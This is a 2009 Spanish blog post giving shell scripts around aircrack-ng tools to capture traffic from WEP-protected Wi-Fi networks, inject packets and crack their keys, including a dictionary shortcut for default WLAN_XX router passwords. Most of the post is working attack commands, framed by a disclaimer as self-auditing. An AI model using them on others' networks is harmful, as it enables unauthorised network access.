jueves, 10 de septiembre de 2009

Scripts para Wifiway y Wifislax

Wifiway y Wifislax son dos distribuciones preparadas para la auditoría wireless. Entre las herramientas disponibles, hay algunas muy interesantes que nos van a permitir conocer (descifrar) la clave WEP de una red en unos pocos minutos.

Sacar la contraseña del router wifi de tu vecino no es una práctica legal, así que NO debes utilizar estas herramientas con ese propósito, sino con el propósito de saber si tu red es segura, para aprender, y como curiosidad.

Las contraseñas WEP están desaprobadas, como mecanismo de privacidad inalámbrico, desde el año 2004. Sin embargo hoy en día todavía se siguen usando.

Para facilitarte la tarea a la hora de descifrar una contraseña WEP y no tengas que acordarte de los comandos y los parámetros, te ofrezco unos scripts (shellscript para GNU/Linux) que agilizarán el proceso. He de decir que estos scripts han sido hechos para ser usados con una tarjeta de red con chipset intel ipw2200. Desconozco si sirven para alguna más.

1 - Escanear redes.
Ejecuta el comando airodump-ng sobre el interfaz de red rtap0 que está en modo monitor.
airodump-ng rtap0

2 - Asociarte a una red.
Una vez que hayas encontrado la red de la cual quieras obtener la contraseña debes asociarte a ella para poder inyectar paquetes posteriormente.
if [ "$1" ]; then
iwconfig eth1 essid $1 key 11111111111
echo OK
else
echo Uso: $0 NOMBRE_RED
fi

3 - Guardar información de la red
Debes guardar toda la información obtenida del tráfico de la red en un fichero, para ello usamos el comando airodump-ng:
if [ "$2" ]; then
airodump-ng -c $1 -b $2 -w fichero rtap0
echo OK
else
echo USO: $0 canal mac_del_router
fi

4 - Inyectar paquetes
Para aumentar el tráfico en la red y así agilizar el proceso de obtención de la clave debemos inyectar paquetes usando aireplay-ng. Importante: cambia 00:01:02:03:04:05 por tu MAC
if [ "$1" ]; then
aireplay-ng -3 -x 600 -b $1 -h 00:01:02:03:04:05 -i rtap0 eth1
else
echo USO: $0 mac_del_router
fi

5 - Obtener la contraseña
Una vez hayamos obtenido alrededor de 40.000 paquetes podemos obtener la contraseña con el comando aircrack-ng
if [ "$1" ]; then
aircrack-ng -z $1
else
echo Uso: $0 Nombre_Fichero_CAP
fi

Si el nombre de la red a obtener es de la forma WLAN_XX (donde XX son 2 cifras hexadecimales) y la contraseña del router es la que venía por defecto. El descifrado de la clave se agiliza muchísimo. Usando la herramienta "wlan_decrpyter" podemos generar un diccionario de claves que luego usaremos como parámetro de entrada del programa aircrack-ng:
if [ "$2" ]; then
aircrack-ng -w $1 $2
else
echo Uso: $0 fich_diccionario fich_cap
fi
Los scripts están disponibles aquí: Descargar

No hay comentarios:

Publicar un comentario